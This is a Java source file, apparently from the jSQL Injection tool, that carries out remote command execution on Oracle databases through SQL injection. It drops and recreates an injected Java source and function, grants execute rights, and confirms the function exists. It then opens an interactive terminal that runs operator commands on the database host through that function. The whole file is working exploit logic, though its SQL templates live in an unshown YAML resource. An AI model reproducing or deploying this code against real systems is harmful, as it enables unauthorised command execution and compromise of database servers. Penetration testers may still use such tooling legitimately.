1 package com.jsql.model.accessible.engine;
2
3 import com.jsql.model.InjectionModel;
4 import com.jsql.model.accessible.ExploitMode;
5 import com.jsql.model.accessible.ResourceAccess;
6 import com.jsql.model.accessible.engine.oracle.ModelYamlOracle;
7 import com.jsql.view.subscriber.Seal;
8 import com.jsql.model.exception.JSqlException;
9 import com.jsql.model.injection.engine.model.EngineYaml;
10 import com.jsql.util.LogLevelUtil;
11 import org.apache.commons.lang3.StringUtils;
12 import org.apache.logging.log4j.LogManager;
13 import org.apache.logging.log4j.Logger;
14 import org.yaml.snakeyaml.Yaml;
15
16 import java.util.Arrays;
17 import java.util.UUID;
18
19 public class ExploitOracle {
20
21 private static final Logger LOGGER = LogManager.getRootLogger();
22 private final InjectionModel injectionModel;
23 private final ModelYamlOracle modelYaml;
24
25 private static final String RCE_JAVA_UTIL_SRC = "RCE_JAVA_UTIL_SRC";
26 private static final String RCE_JAVA_UTIL_FUNC = "RCE_JAVA_UTIL_FUNC";
27
28 public ExploitOracle(InjectionModel injectionModel) {
29 this.injectionModel = injectionModel;
30 var yaml = new Yaml();
31 this.modelYaml = yaml.loadAs(
32 injectionModel.getMediatorEngine().getOracle().instance().getModelYaml().getResource().getExploit(),
33 ModelYamlOracle.class
34 );
35 }
36
37 public void createRce(ExploitMode exploitMode) throws JSqlException {
38 if (!Arrays.asList(ExploitMode.AUTO, ExploitMode.QUERY_BODY).contains(exploitMode)) {
39 LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead");
40 }
41
42 this.injectionModel.injectWithoutIndex(String.format(
43 this.modelYaml.getUdf().getDropSource(),
44 ExploitOracle.RCE_JAVA_UTIL_SRC
45 ), "body#drop-src");
46 this.injectionModel.injectWithoutIndex(String.format(
47 this.modelYaml.getUdf().getDropFunc(),
48 ExploitOracle.RCE_JAVA_UTIL_FUNC
49 ), "body#drop-src");
50 this.injectionModel.injectWithoutIndex(String.format(
51 this.modelYaml.getUdf().getAddSource(),
52 ExploitOracle.RCE_JAVA_UTIL_SRC,
53 ExploitOracle.RCE_JAVA_UTIL_SRC
54 ), "body#add-src");
55 this.injectionModel.injectWithoutIndex(String.format(
56 this.modelYaml.getUdf().getAddFunc(),
57 ExploitOracle.RCE_JAVA_UTIL_FUNC,
58 ExploitOracle.RCE_JAVA_UTIL_SRC
59 ), ResourceAccess.ADD_FUNC);
60 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getGrant(), "body#grant-exec");
61 var nameDatabase = this.injectionModel.getResourceAccess().getResult(String.format(
62 this.modelYaml.getUdf().getConfirm(),
63 EngineYaml.TRAIL_SQL,
64 ExploitOracle.RCE_JAVA_UTIL_FUNC
65 ), ResourceAccess.BODY_CONFIRM);
66 if (!nameDatabase.contains(ExploitOracle.RCE_JAVA_UTIL_FUNC)) {
67 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: java function not found");
68 return;
69 }
70 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found");
71
72 this.injectionModel.sendToViews(new Seal.AddTabExploitUdf(
73 (String command, UUID terminalID) -> this.injectionModel.getResourceAccess().getExploitOracle().runRceCmd(command, terminalID)
74 ));
75 }
76
77 public void runRceCmd(String command, UUID uuidShell) {
78 String result;
79 try {
80 result = this.injectionModel.getResourceAccess().getResult(String.format(
81 this.modelYaml.getUdf().getRunCmd(),
82 ExploitOracle.RCE_JAVA_UTIL_FUNC,
83 command.replace(StringUtils.SPACE, "%20"),
84 EngineYaml.TRAIL_SQL
85 ), ResourceAccess.UDF_RUN_CMD);
86 } catch (JSqlException e) {
87 result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
88 }
89 this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, result));
90 }
91 }